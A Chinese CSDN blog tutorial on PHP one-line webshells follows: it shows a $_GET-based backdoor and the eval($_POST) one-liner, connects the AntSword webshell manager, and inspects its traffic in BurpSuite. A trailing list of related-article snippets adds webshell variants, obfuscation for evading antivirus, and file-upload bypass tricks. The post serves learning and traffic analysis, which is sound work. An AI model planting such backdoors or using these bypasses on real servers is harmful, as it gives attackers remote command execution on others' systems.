抓包分析php一句话木马

最新推荐文章于 2024-08-22 20:44:44 发布
最新推荐文章于 2024-08-22 20:44:44 发布
阅读量3.1k 收藏 12
点赞数 2
分类专栏: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44288604/article/details/108246610
版权

在回答一句话木马是怎么玩的之前,先从最简单的_GET来认识一下

关于一句话木马,其他角度的学习,推荐阅读
Web安全-一句话木马
从wireshark了解蚁剑的工作原理

_GET(PHP数组)

  1. _GET是一个数组
  2. _GET的作用域是超全局,不需在脚本内部定义或初始化,即可使用
  3. 接收从浏览器客户端GET方式(URL中)传递到服务器的参数
  4. GET传参的参数名做_GET数组的key,参数值做为数组的value
  5. GET传参时,直接将参数拼接到URL中即可

举个例子来说明_GET是怎么玩的

<pre>  #标准化输出
<?php
$name="alice"; #初始化一个变量
echo "Your name is {$_GET['name']} "  #输出
?>

直接访问是会出错的,因为我并没有给name传参
在这里插入图片描述
通过给name传参来查看返回结果(上述第三条内容)
在这里插入图片描述

后门

能看明白上面的内容,就来看一个简单的后门

<pre>  
<?php
$_GET['a']($_GET['b']);
?>

直接访问是会出错的
在这里插入图片描述
通过给a,b传参来查看返回结果
在这里插入图片描述
此时就已经创建了一个简单的后门,我可以在里面执行命令了。
把URL里面的参数翻译一下就是用php执行命令:system(whoami)

一句话木马

再看一个很简单的一句话木马

<?php @eval($_POST['777']) ?>
  1. @表示忽略报错
  2. eval表示把字符串当作php代码执行
  3. _POST是通过POST方法接收参数,这里选择POST是因为我一会需要使用中国蚁剑getshell,而中国蚁剑是POST传参的
  4. 777是传参的地方,相当于前面“后门”中的b,这里的777又被称作webshell管理工具的“密码”

getshell

在这里插入图片描述
正常情况下浏览器这边没有返回结果是正常的,接下来连接蚁剑

抓包分析

BurpSuite

1:中国蚁剑走本地8080端口(BurpSuite的监听端口),选择“保存”的时候蚁剑会提示重启,照做就行
在这里插入图片描述
在这里插入图片描述
2:BurpSuite关闭截断
在这里插入图片描述
3:在蚁剑中点开“虚拟终端”,然后随便输入一些命令
在这里插入图片描述
在这里插入图片描述
3:检查数据包
第一条请求和应答数据包
在这里插入图片描述
在这里插入图片描述
第二条请求和应答数据包
在这里插入图片描述
在这里插入图片描述
流量是怎么走的,在数据包里面可以看到,这里由于作者不甚熟知php,所以还不能完整解释语句是怎样拼接的,但可以确定是通过拼接成php命令的方式去执行的。

lainwith
关注
专栏目录
22-2.1 get基于报错的sql注入利用-读敏感文件和写入一句话木马
weixin_43263566的博客
01-25 256
通过这个查询语句,攻击者尝试将一段包含恶意PHP代码的字符串写入到一个指定的文件中,从而创建一个后门(backdoor)程序,可以让攻击者对受害者的服务器进行远程控制和操作。这是一个恶意的SQL注入攻击,它使用UNION注入的方式向数据库中插入一段包含恶意PHP代码的字符串,并将其存储到指定的文件中。因为我也不知道靶场的敏感文件是哪个,所以我就读取我们刚才注入的木马文件。判断MysQL的存储路径方便我们写入一句话马。双击刚才创建的连接就能进入目标的文件管理界面。在现实的情况下这种注入手段成功率很低。
一句话木马拿Shell与菜刀原理
悦分享
07-12 1555
1. 直接上传asp asa jsp cer php aspx htr cdx 格式的木马,不行就加个空格或是利用IIS6.0解析漏洞,常见格式:1.asp;1.jpg 或 1.asp;.jpg 或 1.asp;jpg2. 有时上传图片格式的木马,居然被程序检测拦截了,右键记事本打开木马,在代码最前面加上gif89a,再数据库备份备份成asp格式的木马拿下shell。3. 上传图片格式木马,复制地址到数据库备份备份成asp格式木马,有时不成功的话,就利用IIs6.0解析漏洞,格式:1.asp;
抓包题logs-分析过程.docx
04-15
wireshark数据包分析:包名称:logs
PHP一句话木马免杀方式汇总
最新发布
qq_48368964的博客
08-22 785
create_function函数把用户传递的数据生成一个函数fun(),然后再执行fun()php$fun();?
webshell之一句话木马变形
weixin_30371875的博客
05-05 1502
什么是一句话木马 一句话木马就是只需要一行代码的木马,短短一行代码,就能做到和大马相当的功能。为了绕过waf的检测,一句话木马出现了无数中变形,但本质是不变的:木马的函数执行了我们发送的命令。 我们如何发送命令,发送的命令如何执行? 我们可以通过 GET、POST、COOKIE这三种方式向一个网站提交数据,一句话木马用 $_GET[' ']、$_POST[' ']、$_COO...
一句话木马
飞鱼计划
09-06 2万+
一句话木马就是只需要一行代码的木马,短短一行代码,就能做到和大马相当的功能。为了绕过waf的检测,一句话木马出现了无数中变形,但本质是不变的:木马的函数执行了我们发送的命令。 我们如何发送命令,发送的命令如何执行? 我们可以通过GET 、POST 、COOKIE这三种方式向一个网站提交数据,一句话木马用$_GET[' ']、$_POST[' ']、$_COOKIE[' '] 接收我们...
关于php一句话木马
NiceGY
09-09 1万+
服务器上发现被植了很多木马,而且还让人肆意使用...NND <?php @eval($_POST['c']);?> 使用方法也很简单,本地提交文件指向提交文件,里面的php代码就会被执行
文件上传一句话木马getshell
qq_41620273的博客
12-25 5666
文件上传 文件上传流程: a.文件表单提交 b.生成临时文件(读取临时文件信息) c.后端语言判断该文件是否合规 d.合规则保存文件 一句话木马: 1.在phpstudy搭建的站点www目录下写入一个php文件,访问该网站下的php文件成功: 命令执行函数:system()、Exec()、 Shell_exec() passthru(): 只调用命令,把命令的运行结果原样地直接输出到标准输出设备上 1.如url中输入:XXXX/1.php?a=net user mqu sss /add
PHP一句话木马免杀学习
qq_45780190的博客
05-11 3206
PHP一句话木马免杀学习 简单了解php一句话木马原理 <?php @eval($_POST['shell']);?> 首先存在一个名为shell的变量,shell的取值为HTTP的POST方式。Web服务器对shell取值以后,然后通过eval()函数执行shell里面的内容。 将以上代码写入webshell.php文件中然后放在站点目录下通过浏览器访问,以POST方式传入shell=phpinfo(); 一句话木马的变形 常用变形函数 convert_uudecode() #解码一个
一句话木马剖析
milantgh的专栏
07-31 2916
今天我通过菜刀来分析一下一句话原理吧,都是些基础!   wireshark抓包分析:   因为是在本地搭建的分析环境,所以要抓取回环数据包,故: 网络接口信息: 监听回环数据包: 最后问题解决了: wireshark抓包环节:   首先上传一个小马:xm.php到localhost: 开启菜刀,post小马: 在wiresha
中职组网络安全Wireshark抓包题目分析(环境在资源中下载)
qq_57147160的博客
12-23 3499
使用Wireshark查看并分析PYsystem20191桌面下的capture3.pcap数据包文件,找出黑客登录被攻击服务器网站后台使用的账号密码,并将黑客使用的账号密码作为Flag值(用户名与密码之间以英文逗号分隔,例如:root,toor)提交 admin,password 继续分析数据包capture3.pcap,找出黑客攻击FTP服务器后获取到的三个文件,并将获取到的三个文件名称作为Flag值(提交时按照文件下载的时间的先后顺序排序,使用/分隔,例如:a/b/c)提交;...
PHP一句话木马
m0_64338211的博客
12-03 416
1.get.php <?php header("Content-Type: text/html;charset=gb2312"); @eval($_GET['cmd']); ?> http://127.0.0.1/get.php?cmd=system('whoami'); 2.post.php <?php header("Content-Type: text/html;charset=gb2312"); @eval($_POST['cmd']); ?> http:/...
【用一句话木马文件上传漏洞挖掘实战】
m0_68563451的博客
03-03 1266
6.使用AntSword(中国)管理工具连接一句话,注意连接密码就是一句话里的值。5.成功将一句话木马作为头像上传,右键点击查看图像,可以拿到图片路径。3.点击上传头像,将一句话木马改为图片形式上传,并开启bp抓包。4.在抓包代码中将".jpg"改为".php",返回抓包结果。#用一句话木马文件上传漏洞挖掘实战。1.点击新用户注册,注册一个用户。2.注册成功后点击我的个人资料。打开火狐浏览器,访问目标地址。
PHP编程基础03---get&post 一句话木马
Z_l123的博客
12-03 3030
准备 1.下载火狐浏览器 2.安装HackBar插件 GitHub - HCTYMFF/hackbar2.1.3 下载后拖入即可 3.选择HackBar 4.关闭自动更新 get 1.编写一句话木马 <?php @eval($_GET['cmd']); ?> 2.用本机ip访问木马文件并查询ipconfig 3.若查询结果出现乱码 则在php中添加 header('Content-Type:text/html;charset=gbk'); ...
@php一句话猥琐流搞法
fengling132的专栏
04-20 1195
在渗透中常常遇到拦截eval的,所以 这种形式的会被拦截 常见的是变成 base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz4=) 这种形式可以绕过,另外还有其他形式         今天见一比较怪的东西:web杀毒。v1.0。点。心想是不是谁有跟云扯上了。   完了才知道是个webshell扫描工具。各位前辈把web后门弄的死
php一句话木马变形技巧
热门推荐
bylfsj的博客
09-24 4万+
一、什么是一句话木马一句话木马就是只需要一行代码的木马,短短一行代码,就能做到和大马相当的功能。为了绕过waf的检测,一句话木马出现了无数中变形,但本质是不变的:木马的函数执行了我们发送的命令。 二、我们如何发送命令,发送的命令如何执行? 我们可以通过 GET、POST、COOKIE这三种方式向一个网站提交数据,一句话木马用 $_GET[' ']、$_POST[' ']、$_COOKIE[' ...
最新php一句话
收集盒 Book box
10-28 807
第一种:1.php $_=@$_GET[2]).@$_($_GET[1])?> 在菜刀里写http://127.0.0.1/1.php?2=assert密码是1 第二种2.php $_=""; $_[+""]=''; $_="$_".""; $_=($_[+""]|"").($_[+""]|"").($_[+""]^""); ?> 在菜刀里写 http://127.
木马分析(控制分析)实验
weixin_30443813的博客
10-29 436
一、实验目的 理解和掌握木马传播和运行的基本原理 在虚拟机上模拟木马传播和感染 认识常见的木马控制功能 加深对木马的安全防范意识 二、实验内容 介绍与木马相关的基本概念 配置木马文件 测试木马的各项控制功能 使用Wireshark工具尝试分析木马的控制过程 三、要求环境 木马控制端及受控端生成程序:上兴远控 网络通信数据嗅探工具:Wireshark W...
突破upload-labs19-20:利用PHP绕过文件名限制上传漏洞
通过这种手法,攻击者可以隐藏恶意代码,例如一句话木马,使其看起来像是合法的PHP文件,从而避开服务器的常规安全措施。这提醒我们在开发Web应用时,不仅要关注文件类型,还要对上传内容进行深度检查和验证,以防止...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值